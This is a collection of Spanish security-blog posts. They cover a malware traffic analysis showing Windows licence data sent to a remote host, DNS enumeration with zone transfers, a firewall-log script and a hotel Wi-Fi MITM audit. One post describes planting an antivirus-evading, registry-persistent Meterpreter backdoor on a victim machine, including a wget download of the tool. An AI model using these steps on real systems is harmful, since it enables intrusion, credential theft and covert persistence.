Muy buenas a todos/as!

Por ser el informático de la familia te encuentras muchas veces con mucho malware que tienes que quitar, aunque si que es verdad los últimos ordenadores que me he encontrado no solo he limpiado el Malware si no, que, además me he quedado con el binario para jugar con él . Esta última vez se trata de un software que simula ser un uploader de fotos. Quería saber como funcionaba el Malware así que preparé mi máquina virtual y lo ejecuté a ver que pasaba.

No solo el Software no funcionaba como Uploader sino, que, además generaba cierta actividad de red.

Las peticiones DNS:

Esto ya me resultó raro, aunque tratandose de Malware.. es normal. Pero entonces observe estas peticiones

Peticiones HTTP:

Al parecer se añade un usuario a una web remota. El usuario es el nombre de mi pc, y la password la licencia de Windows. Es decir, envía a una base de datos remota mi licencia de Windows. Esto no lo había visto ahora, mola.

Quería saber como Robtex si se trataba de un sistema autónomo y había mas hosts cometiendo fraude.

Alojando en Rusia, como no !

En la página web existen diferentes directorios, entre ellos:

Este es el Software que se descarga la gente que accede por error a la URI en cuestión

De las conexiones capturadas con Wireshark se puede ver:

GET /home?action=add&username=MI%20PC&password=password&app=Windows&pcname=PERSONAL-23AB6E&sitename=Microsoft HTTP/1.1
User-Agent: HardCore Software For : Public
Host: ejemplo.com

HTTP/1.1 301 Moved Permanently
Date: Sun, 12 Feb 2012 14:24:02 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Location: http://cantportforward.com/home/?action=add&username=MI%20PC&password=password&app=Windows&pcname=PERSONAL-23AB6E&sitename=Microsoft
Content-Type: text/html
Content-Length: 413

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF=”%s”>here</A>.<hr />
Powered By <a href=’http://www.litespeedtech.com’>LiteSpeed Web Server</a><br />
<font face=”Verdana, Arial, Helvetica” size=-1>LiteSpeed Technologies is not responsible for administration and contents of this web site!</font></body></html>
GET /home/?action=add&username=MI%20PC&password=ejemplo&app=Windows&pcname=PERSONAL-23AB6E&sitename=Microsoft HTTP/1.1
User-Agent:  Public
Host: ejemplo.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sun, 12 Feb 2012 14:24:02 GMT
Server: LiteSpeed
Connection: close
Set-Cookie: PHPSESSID=a8711e0c5081845ef1838155557b3714; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 0

En otro de los directorios,a  los que puedes acceder te encuentras con esta página:

Si se observa el código fuente, una vez loqueado puedes hacer las siguientes búsquedas:

<form name='search' method='GET' action='index.php?action=search'>
		<strong>Search for:</strong> <input type='text' name='query' size='20' value="xp"> In: <select name='in'>

		<option  value='0'>Softwares</option>
		<option  value='1'>Sitename</option>
		<option selected=selected value='2'>Username</option>
		<option  value='3'>Password</option>
		<option  value='4'>PC Name</option>
		<option  value='5'>IP Address</option>

		<option  value='6'>Date</option>
		</select>
		<input type='submit' value='Search' name='search'>
	</form>

Parece ser que se confirma mi sospecha de que es una base de datos donde se guardan ordenadores junto con sus licencias.

Para acabar, el panel será vulnerable a SQL Injection? El servidor tendrá alguna vulnerabilidad que pueda ser explotada?

En fin.. seguiremos trabajando en ello

Muy buenas a todos/as!

Desde que entré a trabajar en el departamento de ecrime en S21Sec sabía que me acabaría tocando analizar malware. Es algo que me tenía bastante intrigado, pues pensaba que solo se basaría en hacer Ingeniería inversa. Y eso me daba pánico, porque es algo que no he echo en mi vida y ya os aseguro que viendo algún compañero de la empresa como lo realiza..da miedo… jeje.

Los primeros pasos que hice para analizar un  malware es hacer un análisis de comportamiento del mismo, esto se puede hacer por ejemplo desde una máquina virtual y con un Wireshark capturando el tráfico desde fuera, siempre y cuando el Malware en cuestión no tenga una protección de las que detecta que está siendo ejecutado en una máquina virtual. demás existen software que protegen el ejecutable los llamados packers que dificultan el análisis del binario mediante ingenría inversa, pero eso ya lo veremos mas adelante. En este blog ya he analizado algún que otro Malware viendo que conexiones hacía que ficheros de sistema cambiaba etc..

De eso se trata en parte un análisis de comportamiento de Malware. Yo para la gente que quiera empezar lo haría así:

1. Tener una máquina virtual Windows en Host-Only, preferiblemente.
2. Tener instalado InstallRite en la máquina virtual.
3. Tener capturando la actividad de la tarjeta de red con Wireshark

Estos 3 pasos básicos ya nos pueden dar una idea de que hace el malware en cuestión.

Si recordamos el artículo de analizando morto, la cantidad de conexiones que hacía el troyano, vuelvo a poner la imagen que tenía en el artículo:

Y los cambios que hacía en sistema, por ejemplo con InstallRite

Este artículo de hoy es para comentar dos cosas, la primera es que para los que quieran empezar a hacer análisis de malware no os preocupéis si no sabéis hacer ingeniería inversa, aunque os animo a que aprendáis si os vais a querer dedicar, lo segundo es que analizando como se comporta el troyano en si ya sabemos cual es su modus operandi, si el malware se actualiza, de donde etc..

Así que ánimos

Saludos

Muy buenas a todos/as!

“La información es poder”, y que razón tenía Francis BACON al decir esta frase. Cuando realizas una auditoría, siempre tenemos el primero apartado, el apartado de Fingerprinting, en el cual se comprueba entre otras cosas que información pública contiene el target objetivo.

Una de las cosas que se pueden mirar es la versión del DNS, y es por eso que existen herramientas como dnsenum que te facilitan esta tarea.

dnsenum evalúa:

1) Get the host’s addresse (A record).

2) Get the namservers (threaded).

3) Get the MX record (threaded).

4) Perform axfr queries on nameservers and get BIND versions(threaded).

5) Get extra names and subdomains via google scraping (google query = “allinurl: -www site:domain”).

6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).

7) Calculate C class domain network ranges and perform whois queries on them (threaded).

8) Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).

9) Write to domain_ips.txt file ip-blocks.

Nos sirve perfectamente para hacer las pruebas que necesitamos.

La herramienta la podemos descargar por SVN de aquí: dnsenum

Para hacerla funcionar hará falta que se instalen los siguiente módulos cpan:

Necesarios:
Net::IP
Net::DNS
Net::Netmask
Opcionales:
Net::Whois::IP
HTML::Parser
WWW::Mechanize
XML::Writer

Una vez tengamos los requisitos necesarios podemos empezar a usar la aplicación, pondré tres ejemplos.

Host que NO permite trasferencia de zona:

Para lanzar dnsenum

perl dnsenum.pl xubuntu.com

dnsenum.pl VERSION:1.2.2

—– xubuntu.com —–
Host’s addresses:
__________________

xubuntu.com 600 IN A 91.189.90.40
xubuntu.com 600 IN A 91.189.90.41
xubuntu.com 600 IN A 91.189.89.88
Name Servers:
______________

ns1.canonical.com 147710 IN A 91.189.94.173
ns2.canonical.com 147528 IN A 91.189.94.219
ns3.canonical.com 126351 IN A 209.6.3.210
Mail (MX) Servers:
___________________

 

Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for xubuntu.com on ns1.canonical.com …
AXFR record query failed: NOERROR

ns1.canonical.com Bind Version: 9.7.3

Trying Zone Transfer for xubuntu.com on ns3.canonical.com …
AXFR record query failed: NOERROR

ns3.canonical.com Bind Version: 9.7.3

Trying Zone Transfer for xubuntu.com on ns2.canonical.com …
AXFR record query failed: NOERROR

ns2.canonical.com Bind Version: 9.7.3
Wildcards detected, all subdomains will point to the same IP address, bye.

Podemos ver que ha conseguido extraer la información del BIND pero no permite trasferencia de Zona.

Hagamos otra comprobación:

perl dnsenum.pl gnu.org

dnsenum.pl VERSION:1.2.2

—– gnu.org —–
Host’s addresses:
__________________

gnu.org 300 IN A 140.186.70.148
Name Servers:
______________

ns2.gnu.org 300 IN A 87.98.253.102
ns1.gnu.org 300 IN A 140.186.70.164
ns3.gnu.org 300 IN A 46.43.37.70
Mail (MX) Servers:
___________________

eggs.gnu.org 300 IN A 140.186.70.92
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for gnu.org on ns2.gnu.org …
gnu.org 300 IN SOA
gnu.org 300 IN A 140.186.70.148
gnu.org 300 IN TXT
gnu.org 300 IN MX
gnu.org 300 IN NS
gnu.org 300 IN NS
gnu.org 300 IN NS
gnu.org 300 IN SSHFP
alpha.gnu.org 300 IN A 140.186.70.21
anoncvs.gnu.org 300 IN CNAME
arch.gnu.org 300 IN CNAME
audio-video.gnu.org 300 IN CNAME
audio-video-dev.gnu.org 300 IN A 140.186.70.157
audio-video-dev.gnu.org 300 IN SSHFP
autoconfig.gnu.org 300 IN A 140.186.70.30
be.gnu.org 300 IN NS
be.gnu.org 300 IN NS
ftp.be.gnu.org 300 IN CNAME
www.be.gnu.org 300 IN CNAME
beeblebrox.gnu.org 300 IN SSHFP
bugs.gnu.org 300 IN A 140.186.70.43
bzr.gnu.org 300 IN CNAME
catalyst.gnu.org 300 IN SSHFP
chapters.gnu.org 300 IN A 91.121.254.230
front.chapters.gnu.org 300 IN A 91.121.254.230
clock.gnu.org 300 IN CNAME
www.cn.gnu.org 300 IN A 61.152.210.194
cvs.gnu.org 300 IN CNAME
dbd.gnu.org 300 IN A 140.186.70.32
dbd.gnu.org 300 IN SSHFP
debbugs.gnu.org 300 IN A 140.186.70.43
debbugs.gnu.org 300 IN SSHFP
eggs.gnu.org 300 IN A 140.186.70.92
eggs.gnu.org 300 IN SSHFP
elpa.gnu.org 300 IN A 140.186.70.89
elpa.gnu.org 300 IN SSHFP
es.gnu.org 300 IN MX
es.gnu.org 300 IN A 91.121.254.230
bee.es.gnu.org 300 IN CNAME
www.bee.es.gnu.org 300 IN CNAME
bluewall.es.gnu.org 300 IN CNAME
bussiness.es.gnu.org 300 IN CNAME
bw.es.gnu.org 300 IN CNAME
conferencias.es.gnu.org 300 IN CNAME
emacs.es.gnu.org 300 IN CNAME
www.emacs.es.gnu.org 300 IN CNAME
empresas.es.gnu.org 300 IN CNAME
evalhackers.es.gnu.org 300 IN CNAME
ftp.es.gnu.org 300 IN CNAME
ghm.es.gnu.org 300 IN CNAME

[...]

Podemos ver que el dominio de GNU.org permite trasferencia de zona en el DNS.

En algún DNS también nos dejan mensajes de los mas curiosos:

perl dnsenum aeat.es

—– aeat.es —–
Host’s addresses:
__________________

aeat.es 3176 IN A 195.235.106.193
Name Servers:
______________

esifw2.tsai.es 106 IN A 213.4.194.5
esifw1.tsai.es 256 IN A 213.0.43.37
Mail (MX) Servers:
___________________

correodeempresas.telefonica.es 300 IN A 212.170.236.87
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for aeat.es on esifw1.tsai.es …
AXFR record query failed: NOERROR

esifw1.tsai.es Bind Version: :-b

Parece ser que no quieren que miremos la versión

Si queréis analizar un DNS de manera automática esta herramienta os puede ayudar.

Saludos!

Muy buenas a todos/as!

En mis andaduras de configurción del Firewall de Windows 7, me encontraba con el problema de que a veces no sabía si un paquete estaba recibiendo un DROP un allow. Los firewalls en general conocen 3 estados para la decisión con un paquete:

Allow: El paquete mediante una regla preestablecida deja pasar hacia fuera

Drop:Se deniega el paso del paquete y no manda respuesta de ello

Reject:Se deniega el paso de ese paquete, manda un ICMP como destino inalcanzable

El log de Firewall de Wndows 7 es bastante sencillo de interpretar, así que mientras hacía mis pruebas y al mas estilo Unix, con Cygwin me hice un sh para ir comprobando los paquetes. Para activar el LOG en Firewall hemos de ir a la utilidad wf.msc con permisos de administrador.

Si obervamos la imagen tenemos que ir al menú de Propiedades de Firewall

Aqui tenemos los 3 perfiles del firewall, cada perfil se establece en un área de red que heos definido cuando nos conectamos a una red. En el caso de dominio normalmente  si trabajas en dominio en una empresa, privado en casa, por ejemplo y público en todo aquel sitio que no conozcas ni sea de tu confianza.

Aunque puede que cada pefil debería d estar configurado de una manera especial, creo que es bueno configurar el Firewall lo mas restringivo posible en todas las áreas, siendo así una medida de mitigación contra posibles ataques del exterior.

En el apartado de inicio de sesión:

Para cada uno de estos dominios, hemos de activar que registre los paquetes descartados y correctos. El log se guarda por defecto en:

/Windows/System32/LogFiles/Firewall/pfirewall.log

Como trabajo mucho con Cygwin, con un simple tail, podríamos ir viendo como se van registrando los paquetes:

#!/bin/bash

#Shell que hace un tail de las conexiones del Firewall

tail -f /cygdrive/c/Windows/System32/LogFiles/Firewall/pfirewall.log

Una utilidad mas por si hay alguien que queire probarlo

Muy buenas a todos/as!

Desde siempre las redes Wireless han sido un foco para los atacantes. Las redes Wireless desde siempre han sufrido ataques desde que se implementaron en el mercado. Si recordamos primero, primero las redes Wireless surgieron abiertas, la gente empezó a quejarse y entonces mejoraron la seguridad a WEP, esto al principio fue una medida de mitigación pero pronto empezaron a surgir los primeros ataques contra redes inalámbricas, un ejemplo de un posible ataque que podía afectar a las redes era el de inyección, del que ya hablé aquí, otro ataque que tambiñen podía romper redes Wireless mucho más rápido era el ataque Chop Chop, que también expliqué por aquí.

Mas tarde surgió el protocolo WPA y WPA2 que consiguieron mitigar en gran parte los ataques a este tipo de infraestructuras.

En cada vez mas servicios que se ofrecen al público, tanto en cafeterías como en Hoteles, como en centros comerciales ofrecen servicio de Wireless o bien gratuíto, o bien de pago.

Estos servicios deberían de cumplir unos requisitos mínimos, por ejemplo, que si existe dos redes Wireless en el hotel, una de invitados y otra para los ya inscritos fueran por VLAN’s diferentes.

Otro de los requisitos es que exista isolation entre clientes en la misma red, es decir, que no pueda ver quien está conectado ni poder capturar con mi tarjeta en modo promiscuo los datos que navegan a través de la red.

También sería normal que si NO estamos autenticados en la red, no tengamos la visibilidad de los demás clientes conectados.

Una vez conectados a la red, por ejempo, con Cain hacemos un escaneo de los hosts de la red.

Parece ser que tenemos acceso a ver los clientes conectados en la red, ahora mismo está sin autenticar es decir, no está bien configurada la red.

Un ataque posible sería realizar un MITM, con Cain es muy fácil, también expliqué por aquí como se hacía

Haciendo el ataque de Poisoning podemos robar credenciales, por ejemplo:

Se pueden capturar las contraseñas haciendo un ataque Man in the middle

Si guardamos un pcap de la red, podemos consultar mucho mejor los datos extraídos.

Con NetworkMinner podemos ver los datos mas ordenados

Por último y debido a que ya con un Smartphone podemos auditar una red con ANTI para Android pude sacar este report

Los resultados són:

39 devices found on 192.168.1.36/24 network:

1. IP=10.1.1.1, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!

2. IP=10.1.1.3, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

3. IP=10.1.1.15, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] – Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] – Opened port found.     [80/http] – Make sure you’re using latest HTTP Server.     [443/https] – Opened port found.

4. IP=10.1.1.21, MAC=[XX:XX:XX:XX:XX:XX], Type=Linux Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

5. IP=10.1.1.22, MAC=[XX:XX:XX:XX:XX:XX], Type=Linux Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

6. IP=10.1.1.23, MAC=[XX:XX:XX:XX:XX:XX], Type=Linux Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

7. IP=10.1.1.24, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

8. IP=10.1.1.25, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] – Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] – Opened port found.     [80/http] – Make sure you’re using latest HTTP Server.     [443/https] – Opened port found.

9. IP=10.1.1.35, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] – Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] – Opened port found.     [80/http] – Make sure you’re using latest HTTP Server.     [443/https] – Opened port found.

10. IP=10.1.1.41, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] – Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] – Opened port found.     [80/http] – Make sure you’re using latest HTTP Server.     [443/https] – Opened port found.

11. IP=10.1.1.42, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] – Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] – Opened port found.     [80/http] – Make sure you’re using latest HTTP Server.     [443/https] – Opened port found.

12. IP=10.1.1.45, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] – Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] – Opened port found.     [80/http] – Make sure you’re using latest HTTP Server.     [443/https] – Opened port found.

13. IP=10.1.1.51, MAC=[XX:XX:XX:XX:XX:XX], Type=Linux Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

14. IP=10.1.1.52, MAC=[00:11:22:33:44:55], Type=Linux Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

15. IP=10.1.1.53, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

16. IP=10.1.1.55, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] – Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] – Opened port found.     [80/http] – Make sure you’re using latest HTTP Server.     [443/https] – Opened port found.

17. IP=10.1.1.62, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

18. IP=10.1.1.63, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

19. IP=10.1.1.71, MAC=[00:11:22:33:44:55], Type=Router Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

20. IP=10.1.1.72, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

21. IP=10.1.1.75, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] – Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] – Opened port found.     [80/http] – Make sure you’re using latest HTTP Server.     [443/https] – Opened port found.

22. IP=10.1.1.81, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

23. IP=10.1.1.82, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] – Make sure you’re using latest HTTP Server.

24. IP=10.1.1.95, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] – Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] – Opened port found.     [80/http] – Make sure you’re using latest HTTP Server.     [443/https] – Opened port found.

25. IP=10.1.1.98, MAC=[XX:XX:XX:XX:XX:XX], Type=Windows Desktop     10 Open Ports:     [135/msrpc] – Opened port found.     [139/netbios-ssn] – Opened port found.     [445/microsoft-ds] – Recommended to block this port in firewall. Start->Run->firewall.cpl. Important tip : Run Windows update!     [5800/vnc-http] – Opened port found.     [5900/vnc] – Opened port found.     [49152/unknown] – Opened port found.     [49153/unknown] – Opened port found.     [49154/unknown] – Opened port found.     [49155/unknown] – Opened port found.     [49157/unknown] – Opened port found.

26. IP=10.1.1.103, MAC=[XX:XX:XX:XX:XX:XX], Type=Windows Desktop     1 Open Ports:     [5357/wsdapi] – Opened port found.

27. IP=10.1.1.107, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!

28. IP=10.1.1.114, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!

29. IP=10.1.1.116, MAC=[XX:XX:XX:XX:XX:XX], Type=Mac/OSX Desktop     No opened ports found!

30. IP=10.1.1.130, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!

31. IP=10.1.1.132, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!

32. IP=10.1.1.139, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!

33. IP=10.1.1.144, MAC=[XX:XX:XX:XX:XX:XX], Type=Mac/OSX Desktop     No opened ports found!

34. IP=10.1.1.164, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!

35. IP=10.1.1.170, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     1 Open Ports:     [8080/http-proxy] – Opened port found.

36. IP=10.1.1.181, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!

37. IP=10.1.1.183, MAC=[XX:XX:XX:XX:XX:XX], Type=Linux Device     No opened ports found!

38. IP=10.1.1.191, MAC=[XX:XX:XX:XX:XX:XX], Type=Windows Desktop     4 Open Ports:     [443/https] – Opened port found.     [990/ftps] – Opened port found.     [993/imaps] – Opened port found.     [995/pop3s] – Opened port found.

39. IP=10.1.1.194, MAC=[XX:XX:XX:XX:XX:XX], Type=Mac/OSX Desktop     No opened ports found!

Hay ordenadores bastante interesantes con bastantes puertos, que podrían dar mucho juego…

Aunque basta ya de jugar, la gente querrá consultar su correo

Muy buenas a todos/as!

No podía dejar de poner en este blog la web de Hack Story un proyecto que administra la ya conocida en la red Merce Molist.

Así que empezamos el “primer día” laborable en la que os recomiendo esta web.

Hack Story nace en verano de 2008 en Barcelona. Es un proyecto vivo de recuperación de la historia de la comunidad hacker.

Os copio y pego la definición del about:

Hack Story nace en verano de 2008 en Barcelona. Es un proyecto vivo de recuperación de la historia de la comunidad hacker.

Actualmente abarca la comunidad hacker hispana, aunque tiene vocación planetaria, de ahí el uso del inglés en los principales parámetros, categorías y textos de presentación. El contenido, en cambio, se escribe en el idioma de sus protagonistas. Otras lenguas, espacios y tiempos son bienvenidos.

Hack Story se manifiesta en la red a través de una plataforma wiki, para que cualquiera pueda corregir errores o añadir datos (debido a recientes bombardeos de “spam”, hemos moderado la introducción de nueva información en el wiki, así como la creación de nuev@os usuari@s).

Mercè Molist es la administradora del wiki en lo que a contenidos se refiere. Xavi Caballé aportó desinteresadamente el alojamiento en sus inicios y Alfonso, la personalización del wiki y ayuda técnica. Gracias a Harko por el apoyo gráfico y a Blackhold por actualizar el software, ambos de forma voluntaria. Actualmente la Hackstory tiene alojamiento y servicio técnico gratuitos en NONFQDN. ¡Gracias!

Hack Story está sujeta a su propia política, a la ética hacker y a las leyes vigentes, por este orden

Os adjunto un pantallazo del Hack Story

Os animo a pasaros por esta Wiki a aprender mas sobre los Hackers

Saludos

Muy buenas a todos/as!

Después de estas fiestas navideñas, reuniones familiares, cenas y quedadas con amigos, el disfrute con la comida y bebida, se acaban mis vacaciones. Y es que, después de no haberlas echo este año, la verdad es que me han sentado muy bien, y muchas ganas de volver mañana no se tienen.

Este año ha estado sujeto a bastantes cambios, tanto en lo personal como en lo profesional, y es que sobretodo en lo profesional ha dado un vuelco del que nunca me hubiera imaginado, a mejor claro.

Ahora por fin me puedo dedicar a una de las ramas que MAS me gustan y esa es, la Seguridad Informática.

El año 2010 lo empecé trabajando como Técnico Wireless en el mayorista Wifisafe Spain. La verdad es que salía bastante quemado de mi anterior trabajo y empecé con mucha ilusión en este nuevo trabajo, del que, la verdad es que tenía muy poca experiencia. Estuve bastante tiempo afincado y muy cómodo y la verdad es que me dedicaba a aprovechar mi tiempo libre y demás. Ese año con Nicolas estábamos preparando las conferencias de la No cON Name en Barcelona. Era mi primera experiencia preparando unas conferencias de referencia en el sur de Europa. Pude conocer muchísima gente, hacer nuevos amigos, compartir experiencias, en resumen fue una experiencia muy agradable.

No me había definido e año 2010 ningún objetivo en concreto, iba investigando y publicando cosas en el blog que me parecían interesantes.

Después de ya llevar un tiempo trabajando en Mayorista decidí dar un cambio de profesión y ya orientarme a la seguridad, ya fuera como auditor, o bien como consultor. La oportunidad me llego, y pude cambiar a una consultora de seguridad donde además conocí a un máster como director técnico a Ricardo, un saludo desde aquí crack!

Por cosas que no vienen al caso, en esta consultora no me quedé mucho tiempo y es que me ficho una de las grandes, S21Sec.

La verdad es que había oído hablar mucho de ellos, y se que los que trabajaban ahí son referente en seguridad. Es una empresa que tiene muchos proyectos, en concreto no entré ni como consultor ni como auditor, sino, en el departamento de e-crime. Nunca había oído hablar de eso de e-crime, no sabía excactamente a que se dedicaban, pero ahora que llevo bastante tiempo, puedo decir que me encanta el departamento, las tareas que se desarrollan y la cantidad de cosas que he aprendido en muy poco tiempo. Y es que en esta empresa nunca te vas cada día sin aprender algo nuevo de tus compañeros, y es que a veces te sientes como una hormiga rodeada de gigantes.

Aprovecho para poder empaparme de todo y poder aprender lo máximo de todos ellos cada día sin excepción. El trabajo diario me gusta, los compañeros son geniales, además de que no me coge lejos de casa ¿Que mas le puedo pedir?

Este año 2011 mi vida profesional ha dado un cambio a mejor, a mucho mejor, y solo le deso a este nuevo año, consolidar lo ya conseguido este año anterior y seguir mejorando cada día mas.

Ya iréis viendo a que me dedico en mi trabajo, o que proyectos empiezo a nivel personal. Que no son pocos.

Saludos.

Muy  buenas a todos/as!

El otro día con la guía de Offensive Security configurábamos un Windows XP Service Pack 2 para hacer pruebas de pentesting.

Hoy lo que haremos será preparar un entorno completo vulnerable para hacer pruebas, por ejemplo con Metasploit.

El gráfico de red sería el siguiente:

Ya tenemos el gráfico del entorno que configuararemos.

Para trabajar con este entorno lo haremos con una nueva red que añadiremos en VMware

Este el menú principal de VMware Workstation 8, nos dirijimos a Virtual Network Editor

Como no quiero fastidiar ningún entorno que tengo ahora añadiremos una interfaz mas, con otro rango de direcciones IP

Añadimos la interfaz que deseemos

He cambiado el rango del DHCP, ahora todas las máquinas del entorno vulnerable serán asignadas a VMnet2

Para el entorno usaremos Metasploitable, pero el que tienen creado en la web de Metasploit, se puede descargar aquí

Para Windows Server 2003, Windows Server 2000, Windows XP SP2 Y SP3, neesitaremos una licencia válida.

Además de descargar Metasploitable de los chicos de Metasploit, también descargad UltimateLAMP, lo usaremos en el entorno mas tarde, se puede obtener de aquí

En el siguiente apartado, empezaremos a hacer prácticas con el entorno

Saludos cordiales

Muy buenas a todos/as!

Muchas de las veces en las que se consigue acceso remoto a otro host mediante una vulnerabilidad explotada con Metasploit (por ejemplo) en la que conseguimos una shell con Meterpreter. Es bueno intentar dejar un backdoor por si queremos volver a acceder en un futuro.

La problemática de un backdoor instalado en la parte de la víctima es la detección del antivirus, que aunque no sea la panacea de la seguridad, cumple parte de su función.

Para que el ejecutable que dejaremos no sea detectado por el antivirus codificaremos el ejecutable con shitaka ga nai de Metasploit, tras conseguir acceso remoto en el equipo lo dejaremos en el equipo víctima, además pondremos una clave en el registro para que se inicie en cada inicio del sistema operativo.

Para hacer esta tarea, usaremos un script de SecurityLabs y The Hackers News que se llama Vanish, lo podemos descargar de aquí

Como dependencias para usar el script hemos de instalar las siguientes dependencias

root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

Nos bajamos el script

root@bt:~# wget http://localhostr.com/file/p4SrRVe/vanish.sh

Si queremos consultar el código fuente del script podemos también verlo en Pastebin

Una vez hemos descargado el script, si lo usamos en backtrack como es mi caso, lo hemos de copiar a la carpeta donde se encuentre Metasploit, es decir, /pentest/exploit/framework

Una vez lo hayamos copiado, lo ejecutamos, nos irá haciendo preguntas sobre la targeta de red, un número seed aleatorio y las veces que será encodeado con shitaka ga nai

El ejecutable se creará, nos hará una firma de hash del ejecutable, además de meterlo en una carpeta que se llama seclab

Para comprobar la fiabilidad de nuestro ejecutable lo subiremos a Virus Total, del que obtendremos una buena noticia dado el bajo ratio de detección:

El ratio de detección es muy bajo y eso nos permitirá el poder evadir la mayoría de antivirus

Como ya tenemos sesión con Meterpreter es sencillo el poder subir un archivo al host víctima

Le cambiado el nombre para que el archivo no se llame backdoor.exe

Ahora depende del atacante si quiere dejarlo así y enviar este ejecutable por email o ejecutarlo cada vez que vulnera la máquina o bien, puede añadir una entrada al registro para que se inicie en cada inicio de sistema operativo.

Luego desde la máquina atacante podemos hacer una conexión al host víctima

Podremos tener accesos remotos al equipo víctima tantas veces como deseemos con el backdoor generado.

Saludos cordiales

Muy buenas a todos/as!

Cada vez mas es mas importante la seguridad en nuestra página web de SSL, no solo por presencia y seguridad sino por aportar  un grado extra a los clientes y que sepan qu están seguros sus datos viajando por tu página web.

Con esta herramienta podremos comprobar la seguridad de nuestra configuración SSL.

La herramienta está disponible en Code Google aquí.

• Comprobando la renegociación SSL:

El que un servidor permite renegociar la sesión es un problema muy grave si no se controla, el que no hayan medidas preventivas como aceleradores SSL o que sólo se pueda renegociar una serie de veces puede acarrear que el servidor sufra una denegación de servicio.

Podemos comprobar si el servidor soporta renegociación:

REGISTERING AVAILABLE PLUGINS  —————————–

PluginOpenSSLCipherSuites – OK    PluginSessionResumption – OK    PluginCertInfo – OK    PluginEmpty – OK    PluginSessionRenegotiation – OK

CHECKING HOST(S) AVAILABILITY  —————————–

example.com:443                  => example.com:443

SCAN RESULTS FOR example.com:443 – example.com:443  ——————————————————–

* Session Renegotiation :

Client-initiated Renegotiations:    Rejected

Secure Renegotiation:               Supported

SCAN COMPLETED IN 0.61 S  ————————

Podemos ver en este caso que el servidor soporta renegociación, es susceptible a sufrir un ataque de denegación de servicio

Otra de las comprobaciones que podemos hacer es hacer un resumen de los diferentes “niveles de ssl”

REGISTERING AVAILABLE PLUGINS  —————————–

PluginOpenSSLCipherSuites – OK    PluginSessionResumption – OK    PluginCertInfo – OK    PluginEmpty – OK    PluginSessionRenegotiation – OK

CHECKING HOST(S) AVAILABILITY  —————————–

example.com:443                  => example.com:443

SCAN RESULTS FOR example.com:443 – example.com:443  ——————————————————–

* Session Resumption :       Using TLSv1 Session IDs:       Supported       Using TLSv1 Session Tickets:   Supported       Using SSLv3 Session IDs:       Error => SSL Handshake failed: Failed – SSL Bad decompression

SCAN COMPLETED IN 0.65 S  ————————

Podemos ver que soporta renegociación con diferentes ssl.

